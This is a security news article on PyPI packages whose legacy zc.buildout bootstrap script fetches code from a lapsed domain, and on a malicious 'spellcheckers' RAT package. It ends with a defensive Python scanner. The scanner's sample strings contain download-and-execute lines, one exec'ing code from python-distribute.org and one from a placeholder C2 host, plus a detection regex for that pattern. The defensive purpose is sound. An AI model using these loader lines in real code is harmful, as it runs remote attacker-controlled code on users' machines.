Legacy Python Package Vulnerabilities Risk Supply Chain Attacks via Domain Takeover

Legacy Python Packages Vulnerable to Domain Takeover Attacks via Outdated Bootstrap Scripts on PyPI

  • Older Python packages on PyPI still ship a bootstrap script that exposes anyone who runs it to a domain-takeover attack.
  • The script downloads the installer for the obsolete Distribute package from python-distribute[.]org, a domain the project no longer controls and which has been for sale since 2014.
  • Whoever registers that domain can serve malicious code to every developer who runs the script.
  • The script is embedded in several popular packages, including Tornado and slapos.core, so the exposure persists.
  • In a separate case, a malicious PyPI package named “spellcheckers” installed a remote access trojan, showing that the Python ecosystem is under active attack today.

Cybersecurity researchers have identified a supply chain risk in older Python packages distributed through the Python Package Index (PyPI): they carry a bootstrap script that downloads installer code from a domain the project no longer controls, so anyone who runs the script could be handed attacker-controlled code.

The issue centers on the bootstrap script shipped with the build and deployment automation tool zc.buildout. The script tries to download the installation script for the now-obsolete packaging utility Distribute from python-distribute[.]org. That domain has been available for purchase since 2014 and currently serves ads for whoever parked it. Security researcher Vladimir Pezo, writing on the ReversingLabs blog, explained that the script fetches and installs Distribute either by default or when specific command-line options are passed, so if a malicious actor acquires the domain, every run of the script becomes a remote code execution vector.

Multiple PyPI packages, including tornado, pypiserver, slapos.core, roman, xlutils, and testfixtures, still contain the vulnerable bootstrap script. The script is written in Python 2 and pip does not execute it during package installation, so the exposure requires a developer to run it by hand, for example while setting up a development checkout. Even so, shipping it is an unnecessary attack surface. Some affected packages have since removed the script, but slapos.core and the development version of Tornado continue to include it.

This vulnerability is reminiscent of CVE-2023-45311 in the npm package fsevents, disclosed in 2023, where the package's install step downloaded prebuilt binaries from a cloud storage bucket that had been left unclaimed, so that whoever registered the bucket could have served malicious payloads to every install.

In a separate incident, the company HelixGuard discovered a malicious PyPI package named “spellcheckers.” It advertised spelling-error detection backed by OpenAI Vision but in reality installed a remote access trojan (RAT). The trojan connects to an external server, downloads further code and executes it, allowing the operator to run arbitrary Python remotely. The package was first uploaded on November 15, 2025, by the user leo636722 and had been downloaded 955 times before removal. HelixGuard detailed the threat on its official blog.

“The issue lies in the programming pattern that includes fetching and executing a payload from a hard-coded domain, which is a pattern commonly observed in malware exhibiting downloader behavior,” Pezo said, highlighting the risks of leaving outdated scripts in active use.
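The fetch-and-execute pattern Pezo describes is mechanically detectable, and the same check covers both the zc.buildout bootstrap script and a stage loader of the kind attributed to spellcheckers. The scanner below is an added example, not code from ReversingLabs, HelixGuard or any of the affected projects: it parses Python source, flags URLs whose host is on a list of lapsed domains, and flags exec()/eval() calls whose argument is fed by a network fetch. Only python-distribute.org comes from the article; the callee-name lists and the three sample sources are constructed assumptions, and the Python 2 fallback exists because old bootstrap scripts will not parse under Python 3.

```python
"""Spot download-and-execute bootstrap patterns in Python source.

Added example, not code from the ReversingLabs or HelixGuard write-ups. It
flags (a) URLs whose host is on a list of lapsed domains and (b) calls that
feed network-fetched content straight to exec()/eval(). Only
python-distribute.org comes from the article; the callee-name lists and the
sample sources below are assumptions made for illustration.
"""
import ast
import os
import re
from dataclasses import dataclass
from urllib.parse import urlparse

LAPSED_HOSTS = {"python-distribute.org"}        # from the article; extend with your own list
FETCH_NAMES = {"urlopen", "urlretrieve", "get"}  # assumed: callees that return remote content
EXEC_NAMES = {"exec", "eval"}                    # sinks that run a string as code
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
# Fallback for Python 2 sources, which Python 3's parser rejects: an exec
# statement and a fetch call on the same physical line.
PY2_EXEC_RE = re.compile(r"\bexec\b.*\b(?:urlopen|urlretrieve)\s*\(")


@dataclass(frozen=True)
class Finding:
    kind: str    # "lapsed-host" | "remote-url" | "remote-exec"
    line: int
    detail: str


def _callee(call: ast.Call) -> str:
    """Bare name of the called function: 'urlopen' for urlopen(...) and urllib2.urlopen(...)."""
    if isinstance(call.func, ast.Name):
        return call.func.id
    if isinstance(call.func, ast.Attribute):
        return call.func.attr
    return ""


def _fetches(node: ast.AST) -> bool:
    """True if any call nested inside `node` looks like a network fetch."""
    return any(isinstance(n, ast.Call) and _callee(n) in FETCH_NAMES for n in ast.walk(node))


def _url_findings(source: str) -> list[Finding]:
    out = []
    for lineno, text in enumerate(source.splitlines(), 1):
        for url in URL_RE.findall(text):
            host = (urlparse(url).hostname or "").lower()
            lapsed = any(host == h or host.endswith("." + h) for h in LAPSED_HOSTS)
            out.append(Finding("lapsed-host" if lapsed else "remote-url", lineno, url))
    return out


def _exec_findings(source: str) -> list[Finding]:
    try:
        tree = ast.parse(source)
    except SyntaxError:
        # Old bootstrap.py files are Python 2 (exec/print statements); scan them as text.
        return [Finding("remote-exec", i, "py2 fallback: " + t.strip())
                for i, t in enumerate(source.splitlines(), 1) if PY2_EXEC_RE.search(t)]
    return [Finding("remote-exec", n.lineno, ast.unparse(n)[:80])
            for n in ast.walk(tree)
            if isinstance(n, ast.Call) and _callee(n) in EXEC_NAMES
            and any(_fetches(arg) for arg in n.args)]


def scan_source(source: str) -> list[Finding]:
    """All findings for one source text, ordered by line then kind."""
    return sorted(_url_findings(source) + _exec_findings(source), key=lambda f: (f.line, f.kind))


def scan_tree(root: str) -> dict[str, list[Finding]]:
    """Scan every .py file under root (an unpacked sdist, a checkout); keys are files with findings."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
                if found:
                    results[path] = found
    return results


# Constructed samples, not the real scripts. First: the shape of a zc.buildout 1.x
# bootstrap.py run with --distribute, a Python 2 exec statement pulling from the lapsed host.
SAMPLE_PY2_BOOTSTRAP = """\
import urllib2
ez = {}
exec urllib2.urlopen('http://python-distribute.org/distribute_setup.py').read() in ez
"""
# Second: a Python 3 stage loader of the kind attributed to spellcheckers (placeholder host).
SAMPLE_STAGE_LOADER = """\
from urllib.request import urlopen
ns = {}
exec(urlopen("https://c2.example.invalid/stage2.py").read().decode(), ns)
"""
# Third: fetches data but never executes it; should produce only a remote-url note.
SAMPLE_BENIGN = """\
import json
from urllib.request import urlopen
latest = json.loads(urlopen("https://updates.example.invalid/version.json").read())
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_PY2_BOOTSTRAP) + scan_source(SAMPLE_STAGE_LOADER):
        print(f"line {f.line}: {f.kind} {f.detail}")
```

Point `scan_tree` at an unpacked sdist to audit a dependency before vendoring it. The AST path only follows a fetch that sits inside the exec()/eval() argument; code that stores the downloaded bytes in a variable first and executes them later will not be caught, so treat a clean result as a first pass, not a verdict.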
